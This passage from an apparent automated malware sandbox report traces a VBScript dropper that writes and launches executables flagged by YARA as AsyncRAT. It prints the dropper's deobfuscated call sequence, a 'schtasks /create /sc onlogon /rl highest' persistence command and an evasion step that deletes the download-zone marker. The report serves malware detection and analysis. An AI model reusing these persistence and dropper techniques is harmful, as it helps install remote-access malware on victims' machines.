            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\ame.exe 'C:\Users\user\AppData\Local\Temp\ame.exe' Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\fi.exe 'C:\Users\user\AppData\Local\Temp\fi.exe' Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs' Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess created: C:\Users\user\AppData\Roaming\Notepads.exe 'C:\Users\user\AppData\Roaming\Notepads.exe' Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exeJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
            Source: Binary string: mscorrc.pdb source: fi.exe, 00000004.00000002.600584281.0000000004C80000.00000002.00000001.sdmp

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\ame.exe");IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IXMLDOMNode._00000029("tmp");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALKNKPEAAAAAAAAAAOAAIgALATAAANIBAAAIAAAAAAAA7vE");IXMLDOMElement.nodeTypedValue();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\ame.exe", "2");IXMLDOMNode._00000029("tmp");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKEn6VQAAAAAAAAAAOAADgELAQYAAMgBAABgAQAAAAAAkuc");IXMLDOMElement.nodeTypedValue();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\fi.exe", "2");IWshShell3.Run("C:\Users\user\AppData\Local\Temp\ame.exe");IWshShell3.Run("C:\Users\user\AppData\Local\Temp\fi.exe")
            .NET source code contains potential unpackerShow sources
            Source: ame.exe.1.dr, Client/Handle_Packet/HandlerRecovery.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: ame.exe.1.dr, Client/Handle_Packet/HandleLimeUSB.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: ame.exe.1.dr, Client/Handle_Packet/HandleSendTo.cs.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleSendTo.cs.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleLimeUSB.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandlerRecovery.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleSendTo.cs.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleSendTo.cs.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: dhcpmon.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: dhcpmon.exe.4.dr, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleSendTo.cs.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandlerRecovery.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeUSB.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleSendTo.cs.Net Code: SendToMemory System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: ame.exe.1.drStatic PE information: 0xF1288DB2 [Tue Mar 18 07:39:30 2098 UTC]
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_022E5BA1 push E87220CAh; ret 4_2_022E5C26
            Source: dhcpmon.exe.4.dr, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
            Source: dhcpmon.exe.4.dr, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
            Source: 4.0.fi.exe.40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
            Source: 4.2.fi.exe.40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\ame.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\ame.exeFile created: C:\Users\user\AppData\Roaming\Notepads.exeJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\fi.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\fi.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file

            Boot Survival:

            barindex
            Yara detected AsyncRATShow sources
            Source: Yara matchFile source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.325883789.0000016C16535000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.329227770.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.592748395.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.325568596.0000016C16534000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.540116031.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.533753846.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ame.exe PID: 6592, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Notepads.exe PID: 5444, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Notepads.exe PID: 2152, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Notepads.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ame.exe, type: DROPPED
            Source: Yara matchFile source: 3.0.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c1711f630.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.0.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c1711f630.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.129567e0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.0.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.2.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.wscript.exe.16c165eefd0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.129567e0.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
            Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe
            Source: C:\Users\user\AppData\Local\Temp\ame.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSDTC Bridge 3.0.0.0\LinkageJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NET Memory Cache 4.0\LinkageJump to behavior

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
            Source: C:\Users\user\AppData\Local\Temp\fi.exeFile opened: C:\Users\user\AppData\Local\Temp\fi.exe:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
